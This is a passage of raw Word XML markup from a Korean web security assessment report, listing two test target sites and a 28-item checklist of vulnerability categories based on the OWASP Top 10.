      <w:tr w:rsidR="00490D58" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="882" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00A24C89" w:rsidRDefault="00490D58" w:rsidP="00490D58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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2760" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58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/>
              </w:rPr>
              <w:t>70.12.113.49:81</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2577" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58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/>
              </w:rPr>
              <w:t>CoreMall</w:t>
            </w:r>
            <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
              </w:rPr>
              <w:t>om</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2759" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00490D58" w:rsidRPr="00A24C89" w:rsidRDefault="00490D58" w:rsidP="00490D58">
            <w:pPr>
              <w:keepNext/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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F55DE" w:rsidRPr="00C97C1E" w:rsidTr="00E30F75">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="882" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5DFEC" w:themeFill="accent4" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008F55DE" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2760" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008F55DE" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58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/>
              </w:rPr>
              <w:t>70.12.113.49:82</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2577" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008F55DE" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58">
            <w:pPr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hint="eastAsia"/>
              </w:rPr>
              <w:t>AvaterMall</w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2759" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008F55DE" w:rsidRPr="00A24C89" w:rsidRDefault="00E30F75" w:rsidP="00490D58">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00490D58" w:rsidRPr="00A24C89" w:rsidRDefault="00490D58" w:rsidP="00490D58">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc48909108"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;표1- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>&gt; WEB 진단대상</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="00490D58" w:rsidRPr="00C97C1E" w:rsidRDefault="00490D58" w:rsidP="00490D58">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F55DE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E11948" w:rsidP="00E11948">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="66" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00C97C1E" w:rsidRDefault="00490D58" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc48909009"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>진단항목</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="007C1BEC" w:rsidRPr="00A24C89" w:rsidRDefault="0005413B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc408759299"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단</w:t>
      </w:r>
      <w:r w:rsidR="00592FCF" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">항목 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> 항목의 경우 '</w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP TOP 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> ’주요</w:t>
      </w:r>
      <w:r w:rsidR="007C1BEC" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>정보</w:t>
      </w:r>
      <w:r w:rsidR="007C1BEC" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>통신</w:t>
      </w:r>
      <w:r w:rsidR="007C1BEC" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">기반시설 취약점 </w:t>
      </w:r>
      <w:r w:rsidR="00DE25A1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">분석 </w:t>
      </w:r>
      <w:r w:rsidR="00DE25A1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">· </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">평가 기준‘ 항목을 바탕으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">작성. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="00882F34" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">총 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00A24C89">
        <w:t>개 항목으로 세분화</w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 되었으며, 실제</w:t>
      </w:r>
      <w:r w:rsidR="007C1BEC" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사이트에 접근하여 보안취약점 존재여부를 확인하는 방법으로 진단을 수행</w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="0005413B">
      <w:pPr>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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69" w:name="_Toc409006734"/>
      <w:bookmarkStart w:id="70" w:name="_Toc409006985"/>
      <w:bookmarkStart w:id="71" w:name="_Toc409009213"/>
      <w:bookmarkStart w:id="72" w:name="_Toc409009268"/>
      <w:bookmarkStart w:id="73" w:name="_Toc409009325"/>
      <w:bookmarkStart w:id="74" w:name="_Toc409009381"/>
      <w:bookmarkStart w:id="75" w:name="_Toc409009655"/>
      <w:bookmarkStart w:id="76" w:name="_Toc409012640"/>
      <w:bookmarkStart w:id="77" w:name="_Toc428014737"/>
      <w:bookmarkStart w:id="78" w:name="_Toc428825949"/>
      <w:bookmarkStart w:id="79" w:name="_Toc428826025"/>
      <w:bookmarkStart w:id="80" w:name="_Toc428831989"/>
      <w:bookmarkStart w:id="81" w:name="_Toc428832103"/>
      <w:bookmarkStart w:id="82" w:name="_Toc429863579"/>
      <w:bookmarkStart w:id="83" w:name="_Toc461106453"/>
      <w:bookmarkStart w:id="84" w:name="_Toc48720662"/>
      <w:bookmarkStart w:id="85" w:name="_Toc48721357"/>
      <w:bookmarkStart w:id="86" w:name="_Toc48895423"/>
      <w:bookmarkStart w:id="87" w:name="_Toc48903712"/>
      <w:bookmarkStart w:id="88" w:name="_Toc48908651"/>
      <w:bookmarkStart w:id="89" w:name="_Toc48908755"/>
      <w:bookmarkStart w:id="90" w:name="_Toc48908859"/>
      <w:bookmarkStart w:id="91" w:name="_Toc4890901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BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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92" w:name="_Toc409006735"/>
      <w:bookmarkStart w:id="93" w:name="_Toc409006986"/>
      <w:bookmarkStart w:id="94" w:name="_Toc409009214"/>
      <w:bookmarkStart w:id="95" w:name="_Toc409009269"/>
      <w:bookmarkStart w:id="96" w:name="_Toc409009326"/>
      <w:bookmarkStart w:id="97" w:name="_Toc409009382"/>
      <w:bookmarkStart w:id="98" w:name="_Toc409009656"/>
      <w:bookmarkStart w:id="99" w:name="_Toc409012641"/>
      <w:bookmarkStart w:id="100" w:name="_Toc428014738"/>
      <w:bookmarkStart w:id="101" w:name="_Toc428825950"/>
      <w:bookmarkStart w:id="102" w:name="_Toc428826026"/>
      <w:bookmarkStart w:id="103" w:name="_Toc428831990"/>
      <w:bookmarkStart w:id="104" w:name="_Toc428832104"/>
      <w:bookmarkStart w:id="105" w:name="_Toc429863580"/>
      <w:bookmarkStart w:id="106" w:name="_Toc461106454"/>
      <w:bookmarkStart w:id="107" w:name="_Toc48720663"/>
      <w:bookmarkStart w:id="108" w:name="_Toc48721358"/>
      <w:bookmarkStart w:id="109" w:name="_Toc48895424"/>
      <w:bookmarkStart w:id="110" w:name="_Toc48903713"/>
      <w:bookmarkStart w:id="111" w:name="_Toc48908652"/>
      <w:bookmarkStart w:id="112" w:name="_Toc48908756"/>
      <w:bookmarkStart w:id="113" w:name="_Toc48908860"/>
      <w:bookmarkStart w:id="114" w:name="_Toc4890901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BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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15" w:name="_Toc409006736"/>
      <w:bookmarkStart w:id="116" w:name="_Toc409006987"/>
      <w:bookmarkStart w:id="117" w:name="_Toc409009215"/>
      <w:bookmarkStart w:id="118" w:name="_Toc409009270"/>
      <w:bookmarkStart w:id="119" w:name="_Toc409009327"/>
      <w:bookmarkStart w:id="120" w:name="_Toc409009383"/>
      <w:bookmarkStart w:id="121" w:name="_Toc409009657"/>
      <w:bookmarkStart w:id="122" w:name="_Toc409012642"/>
      <w:bookmarkStart w:id="123" w:name="_Toc428014739"/>
      <w:bookmarkStart w:id="124" w:name="_Toc428825951"/>
      <w:bookmarkStart w:id="125" w:name="_Toc428826027"/>
      <w:bookmarkStart w:id="126" w:name="_Toc428831991"/>
      <w:bookmarkStart w:id="127" w:name="_Toc428832105"/>
      <w:bookmarkStart w:id="128" w:name="_Toc429863581"/>
      <w:bookmarkStart w:id="129" w:name="_Toc461106455"/>
      <w:bookmarkStart w:id="130" w:name="_Toc48720664"/>
      <w:bookmarkStart w:id="131" w:name="_Toc48721359"/>
      <w:bookmarkStart w:id="132" w:name="_Toc48895425"/>
      <w:bookmarkStart w:id="133" w:name="_Toc48903714"/>
      <w:bookmarkStart w:id="134" w:name="_Toc48908653"/>
      <w:bookmarkStart w:id="135" w:name="_Toc48908757"/>
      <w:bookmarkStart w:id="136" w:name="_Toc48908861"/>
      <w:bookmarkStart w:id="137" w:name="_Toc4890901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C3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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38" w:name="_Toc409006737"/>
      <w:bookmarkStart w:id="139" w:name="_Toc409006988"/>
      <w:bookmarkStart w:id="140" w:name="_Toc409009216"/>
      <w:bookmarkStart w:id="141" w:name="_Toc409009271"/>
      <w:bookmarkStart w:id="142" w:name="_Toc409009328"/>
      <w:bookmarkStart w:id="143" w:name="_Toc409009384"/>
      <w:bookmarkStart w:id="144" w:name="_Toc409009658"/>
      <w:bookmarkStart w:id="145" w:name="_Toc409012643"/>
      <w:bookmarkStart w:id="146" w:name="_Toc428014740"/>
      <w:bookmarkStart w:id="147" w:name="_Toc428825952"/>
      <w:bookmarkStart w:id="148" w:name="_Toc428826028"/>
      <w:bookmarkStart w:id="149" w:name="_Toc428831992"/>
      <w:bookmarkStart w:id="150" w:name="_Toc428832106"/>
      <w:bookmarkStart w:id="151" w:name="_Toc429863582"/>
      <w:bookmarkStart w:id="152" w:name="_Toc461106456"/>
      <w:bookmarkStart w:id="153" w:name="_Toc48720665"/>
      <w:bookmarkStart w:id="154" w:name="_Toc48721360"/>
      <w:bookmarkStart w:id="155" w:name="_Toc48895426"/>
      <w:bookmarkStart w:id="156" w:name="_Toc48903715"/>
      <w:bookmarkStart w:id="157" w:name="_Toc48908654"/>
      <w:bookmarkStart w:id="158" w:name="_Toc48908758"/>
      <w:bookmarkStart w:id="159" w:name="_Toc48908862"/>
      <w:bookmarkStart w:id="160" w:name="_Toc48909013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BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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61" w:name="_Toc409006738"/>
      <w:bookmarkStart w:id="162" w:name="_Toc409006989"/>
      <w:bookmarkStart w:id="163" w:name="_Toc409009217"/>
      <w:bookmarkStart w:id="164" w:name="_Toc409009272"/>
      <w:bookmarkStart w:id="165" w:name="_Toc409009329"/>
      <w:bookmarkStart w:id="166" w:name="_Toc409009385"/>
      <w:bookmarkStart w:id="167" w:name="_Toc409009659"/>
      <w:bookmarkStart w:id="168" w:name="_Toc409012644"/>
      <w:bookmarkStart w:id="169" w:name="_Toc428014741"/>
      <w:bookmarkStart w:id="170" w:name="_Toc428825953"/>
      <w:bookmarkStart w:id="171" w:name="_Toc428826029"/>
      <w:bookmarkStart w:id="172" w:name="_Toc428831993"/>
      <w:bookmarkStart w:id="173" w:name="_Toc428832107"/>
      <w:bookmarkStart w:id="174" w:name="_Toc429863583"/>
      <w:bookmarkStart w:id="175" w:name="_Toc461106457"/>
      <w:bookmarkStart w:id="176" w:name="_Toc48720666"/>
      <w:bookmarkStart w:id="177" w:name="_Toc48721361"/>
      <w:bookmarkStart w:id="178" w:name="_Toc48895427"/>
      <w:bookmarkStart w:id="179" w:name="_Toc48903716"/>
      <w:bookmarkStart w:id="180" w:name="_Toc48908655"/>
      <w:bookmarkStart w:id="181" w:name="_Toc48908759"/>
      <w:bookmarkStart w:id="182" w:name="_Toc48908863"/>
      <w:bookmarkStart w:id="183" w:name="_Toc48909014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BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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84" w:name="_Toc409006739"/>
      <w:bookmarkStart w:id="185" w:name="_Toc409006990"/>
      <w:bookmarkStart w:id="186" w:name="_Toc409009218"/>
      <w:bookmarkStart w:id="187" w:name="_Toc409009273"/>
      <w:bookmarkStart w:id="188" w:name="_Toc409009330"/>
      <w:bookmarkStart w:id="189" w:name="_Toc409009386"/>
      <w:bookmarkStart w:id="190" w:name="_Toc409009660"/>
      <w:bookmarkStart w:id="191" w:name="_Toc409012645"/>
      <w:bookmarkStart w:id="192" w:name="_Toc428014742"/>
      <w:bookmarkStart w:id="193" w:name="_Toc428825954"/>
      <w:bookmarkStart w:id="194" w:name="_Toc428826030"/>
      <w:bookmarkStart w:id="195" w:name="_Toc428831994"/>
      <w:bookmarkStart w:id="196" w:name="_Toc428832108"/>
      <w:bookmarkStart w:id="197" w:name="_Toc429863584"/>
      <w:bookmarkStart w:id="198" w:name="_Toc461106458"/>
      <w:bookmarkStart w:id="199" w:name="_Toc48720667"/>
      <w:bookmarkStart w:id="200" w:name="_Toc48721362"/>
      <w:bookmarkStart w:id="201" w:name="_Toc48895428"/>
      <w:bookmarkStart w:id="202" w:name="_Toc48903717"/>
      <w:bookmarkStart w:id="203" w:name="_Toc48908656"/>
      <w:bookmarkStart w:id="204" w:name="_Toc48908760"/>
      <w:bookmarkStart w:id="205" w:name="_Toc48908864"/>
      <w:bookmarkStart w:id="206" w:name="_Toc48909015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BC3B3D" w:rsidRPr="00C97C1E" w:rsidRDefault="00BC3B3D" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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207" w:name="_Toc409006740"/>
      <w:bookmarkStart w:id="208" w:name="_Toc409006991"/>
      <w:bookmarkStart w:id="209" w:name="_Toc409009219"/>
      <w:bookmarkStart w:id="210" w:name="_Toc409009274"/>
      <w:bookmarkStart w:id="211" w:name="_Toc409009331"/>
      <w:bookmarkStart w:id="212" w:name="_Toc409009387"/>
      <w:bookmarkStart w:id="213" w:name="_Toc409009661"/>
      <w:bookmarkStart w:id="214" w:name="_Toc409012646"/>
      <w:bookmarkStart w:id="215" w:name="_Toc428014743"/>
      <w:bookmarkStart w:id="216" w:name="_Toc428825955"/>
      <w:bookmarkStart w:id="217" w:name="_Toc428826031"/>
      <w:bookmarkStart w:id="218" w:name="_Toc428831995"/>
      <w:bookmarkStart w:id="219" w:name="_Toc428832109"/>
      <w:bookmarkStart w:id="220" w:name="_Toc429863585"/>
      <w:bookmarkStart w:id="221" w:name="_Toc461106459"/>
      <w:bookmarkStart w:id="222" w:name="_Toc48720668"/>
      <w:bookmarkStart w:id="223" w:name="_Toc48721363"/>
      <w:bookmarkStart w:id="224" w:name="_Toc48895429"/>
      <w:bookmarkStart w:id="225" w:name="_Toc48903718"/>
      <w:bookmarkStart w:id="226" w:name="_Toc48908657"/>
      <w:bookmarkStart w:id="227" w:name="_Toc48908761"/>
      <w:bookmarkStart w:id="228" w:name="_Toc48908865"/>
      <w:bookmarkStart w:id="229" w:name="_Toc4890901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05413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="00592FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="4564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264"/>
        <w:gridCol w:w="5154"/>
        <w:gridCol w:w="1032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00882F34" w:rsidRPr="00C97C1E" w:rsidTr="00DE25A1">
        <w:trPr>
          <w:trHeight w:val="403"/>
          <w:tblHeader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82F34" w:rsidRPr="00C97C1E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882F34" w:rsidRPr="00C97C1E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82F34" w:rsidRPr="00C97C1E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882F34" w:rsidRPr="00C97C1E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BO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버퍼 오버플로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F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포맷스트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L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LDAP 인젝션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O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S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SQL 인젝션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S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SSI 인젝션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X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XPath 인젝션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D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I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C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악성 콘텐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X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크로스사이트 스크립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B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IA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PR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C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크로스사이트 리퀘스트 변조(CSRF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S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I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S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S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A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PV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F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파일 업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FD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파일 다운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A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A24C89">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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데이터 평문 전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C97C1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A24C89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A24C89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A24C89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</w:tbl>
    <w:p w:rsidR="0005413B" w:rsidRPr="00A24C89" w:rsidRDefault="0005413B" w:rsidP="0005413B">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc48909109"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;표1- </w:t>
      </w:r>
      <w:r w:rsidR="00144D86" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00144D86" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00144D86" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00144D86" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>&gt; 웹 어플리케이션 소스 보안 진단 체크리스트</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="0005413B">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc408759301"/>
      <w:bookmarkStart w:id="232" w:name="_Toc408919446"/>
      <w:bookmarkStart w:id="233" w:name="_Toc48909017"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>총평</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
